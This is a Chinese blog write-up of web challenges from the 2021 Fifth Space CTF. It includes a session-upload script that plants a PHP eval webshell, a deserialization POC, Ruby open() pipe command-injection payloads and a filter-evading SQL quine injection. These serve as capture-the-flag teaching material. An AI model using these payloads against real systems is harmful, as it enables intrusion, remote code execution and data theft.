2021第五空间webakwp

最新推荐文章于 2024-04-24 21:08:54 发布
最新推荐文章于 2024-04-24 21:08:54 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: ctfwp 文章标签: php ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/120365169
版权

前言

挺傻逼的,5道web题全是静态靶机,三道rce题,不知道主办方咋想的。
附一张图
在这里插入图片描述
不过也算是ak了web 总体感觉还不错
在这里插入图片描述

webftp

这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的
在这里插入图片描述
赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。

EasyCleanup

源码逻辑很简单,给了phpinfo和任意文件包含请添加图片描述
这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件
那直接传PHPSESSID然后包含就行,都不需要条件竞争。
exp

import io
import requests
import threading

sessid = 'aa'
def write_session(session):
    url = 'http://114.115.134.72:32770/index.php'
    f = io.BytesIO(b'a' * 1024 * 50)
    resp = session.post( 'http://127.0.0.1/session.php?file=/tmp/sess_'+sessid, data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('fmyyy.txt',f)}, cookies={'PHPSESSID': sessid} )


if __name__ == '__main__':
    with requests.session() as session:
        write_session(session)

然后包含/tmp/sess_aa传命令即可请添加图片描述

pklovecloud

简单的反序列化
poc

<?php
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    public function __construct(){
        $this->neutron = '';
        $this->nova = '' ;
        $this->cinder = new ace();
    }
}
class ace
{
    public $filename;
    public $openstack;
    public $docker;
    public function __construct(){
        $this->filename = 'flag.php';
        $this->docker = 'O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BN%3Bs%3A7%3A%22neutron%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22nova%22%3Bs%3A0%3A%22%22%3B%7D';//上一个poc的结果
    }

}

$A = new acp();
echo urlencode(serialize($A));

之后源码找flag

PNG图片转换器

这里利用了ruby的open函数能造成命令执行的特性
open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。

管道字符“|”开头,执行管道字符后面的命令
原题传文件,获得唯一文件名,然后读取文件的base64编码。在读取这里
在这里插入图片描述
file可控,但得满足上面的条件,这个限制也不是很严格
上传两张图片记住文件名
在/convernt处
第一步
file=|echo "Y2F0IC8q"|base64 -d > 0784368baeb4d0a58b04309f20df6f2e.png
Y2F0IC8q是cat /*的base64
第二步
file=|sh 0784368baeb4d0a58b04309f20df6f2e.png>405391431ca1ac9b33f35add1f4ef55c.png
之后读
405391431ca1ac9b33f35add1f4ef55c.png拿到flag base64解码即可
请添加图片描述

补充

赛后跟feng师傅聊了一下 发现不用这么麻烦,在上传处即可命令执行
在这里插入图片描述
可以看到,加密的参数是file[filename]但open的参数file[tempfile]是可控的 所以直接
在这里插入图片描述
再读这个文件即可

yet_another_mysql_injection

能时间盲注,但数据库里啥也没有
再看逻辑,

    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
    die($FLAG);
    }

就是查询语句要和查询结果一样就可以了
这篇文章很详细
https://www.shysecurity.com/post/20140705-SQLi-Quine
原文的payload改一下能用
原文的
SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine
本题有过滤,且是注入,所以得改一下

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

更改后的:
username=admin&password='UNION/**/SELECT/**/REPLACE(REPLACE('"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#',CHAR(34),CHAR(39)),CHAR(63),'"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#')/**/AS/**/a#
直接打就行
请添加图片描述

总结

企业组第十三,,akweb的队伍很多,主要还是靠队友的misc re和密码才拿到这个名次,又被队友带飞了

fmyyy1
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 597
[第五空间 2021] wp
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1489
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
CTFHUB 2021-第五空间 yet_another_mysql_injection
Jay17的博客
07-05 769
CTFHUB 2021-第五空间 yet_another_mysql_injection
[第五空间-2021]yet_another_mysql_injection
最新发布
liaochonxiang的博客
04-24 215
password输入必须和数据库中查询到的一样。username必须为admin。
2021第五空间线上赛web wp
cosmoslin的博客
09-18 631
pklovecloud <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __c
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 4840
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
2021第五空间WEB
~airrudder~
02-24 2913
2021第五空间web部分复现
2021 第五空间 ctf wp
qq_45603443的博客
09-23 2930
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3194
NSSCTF-Web安全入门-wp
nssctf web入门(1)
qq_61988806的博客
04-12 730
这里通过nssctf的题单web安全入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
第五空间web复现
unexpectedthing的博客
09-27 710
@[]
解:[第五空间 2021]yet_another_mysql_injection--TLS_预备队任务(1)
river_mouth_man的博客
03-11 177
sql盲注,like模糊匹配
NSSCTF做题
wwwwyyyrre的博客
09-24 580
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
第三届第五空间网络安全大赛 Web复现
Sk1y的博客
09-24 1119
环境还没关,良心比赛方,赶紧趁着复现复现 文章目录pklovecloudPNG图片转换器EasyCleanupyet_another_mysql_injectionWebFTP pklovecloud 是个pop链,需要注意的地方是acp类型中的成员cinder是protected属性的,序列化之后会增加三个字符%00*%00(url编码之后) <?php include 'flag.php'; class pkshow { function echo_name()
第三届第五空间网络安全大赛-选拔赛-部分Writeup
末初的CSDN博客
09-17 2000
文章目录MISC签到alpha10BabyMimuzikoWEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injection MISC 签到 flag{welcometo5space} alpha10 BabyMi muziko WEB WebFTP 目录扫描发现git泄露 使用GitHack尝试还原代码 发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3290
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 390
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
NSSCTF做题(7)
wwwwyyyrre的博客
10-09 689
反序列化这道题还是反着来,先去找pop链的尾部,找到尾部之后再往前翻1.要想读出 flag.php 就要触发 file_get_contents() 函数;2.要想触发 file_get_contents() 函数就要触发 ace 的 echo_name();
SQL注入之Quine注入
Aiwin的博客
06-29 2589
SQL注入之Quine注入
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1337
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值